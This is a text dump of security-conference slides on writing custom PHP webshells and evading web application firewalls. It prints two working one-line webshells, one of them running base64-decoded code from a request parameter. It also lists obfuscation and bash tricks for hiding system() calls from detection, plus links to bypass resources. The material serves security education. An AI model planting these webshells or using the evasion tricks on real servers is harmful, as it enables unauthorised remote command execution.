I HAVE A DOG NAMED WAF (TENGO UN PERRO QUE SE LLAMA WAF)

Post on 28-Jun-2020



jomoza@wafbypass:/home/bitup# cat talk | more

jomoza@wafbypass:/home/bitup# whoami

Josep Moreno (JoMoZa)
@j0moz4
youtube.com/loveisinthenet
[*] loveisinthe.net

@bitupalicante
[*] bitupalicante.com


Webshell uploaded...

5 MINS AFTER...


404


If you ask about public webshells...

- Can include bad things (miners, ...)
- Can include obfuscated functions (functionality-less)
- IDS/WAF detection


Make your own webshell, and for that...


let's talk about PHP obfuscation, vulnerable functions and some bash tricks...


IT’S A BIND SHELL


Apache, NGINX, Tomcat….Firefox, Chrome,....

webshells...

<?php echo system($_GET["cmd"]); ?>

RCE:

# Remote CODE Execution
(Application context: asp, jsp, php... functions)

# Remote COMMAND Execution
(System context: bash, sh, cmd, ...)

jomoza@wafbypass:/home/bitup# php -c rce

https://stackoverflow.com/questions/3115559/exploitable-php-functions


LeT’s OfUsCaTe SyStEm() FuN

jomoza@wafbypass:/home/bitup# fileless like webshell

jomoza@wafbypass:/home/bitup# ./makeitcool "system()"

ADD COMMENTS AND HEX

http://php.net/manual/en/functions.variable-functions.php

https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/

CONCATENATED STRING

USING DEFINED FUNCTIONS

/*SINGLE STRING CHARACTER*/

https://secure.php.net/manual/es/language.operators.string.php

APPLICATION CONTEXT.

jomoza@wafbypass:/home/bitup# php "<?php rce; ?>"

https://stackoverflow.com/questions/3115559/exploitable-php-functions

https://github.com/lcatro/PHP-WebShell-Bypass-WAF

FILELESS ARE YOU?


jomoza@wafbypass:/home/bitup# fileless like webshell

<?php eval(base64_decode($_GET["bcode"])); ?>


#2 SYSTEM CONTEXT.


DEMO #3

jomoza@wafbypass:/home/bitup# bash globbing

$ php -r 'echo "hello"." world"."\n";'

hello world

jomoza@wafbypass:/home/bitup# string literal concatenation

https://unix.stackexchange.com/questions/10263/how-to-concatenate-string-variables-into-a-third

jomoza@wafbypass:/home/bitup# undefined variables

https://www.secjuice.com/web-application-firewall-waf-evasion/

jomoza@wafbypass:/home/bitup# ./metamorphws start

jomoza@wafbypass:/home/bitup# curl "http://bibliography"

https://medium.com/secjuice/waf-evasion-techniques-718026d693d8
https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0
https://www.secjuice.com/web-application-firewall-waf-evasion/
https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/
https://github.com/lcatro/PHP-WebShell-Bypass-WAF
https://github.com/PortSwigger/bypass-waf
https://stackoverflow.com/questions/3115559/exploitable-php-functions
https://es.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour

@j0moz4

@bitupalicante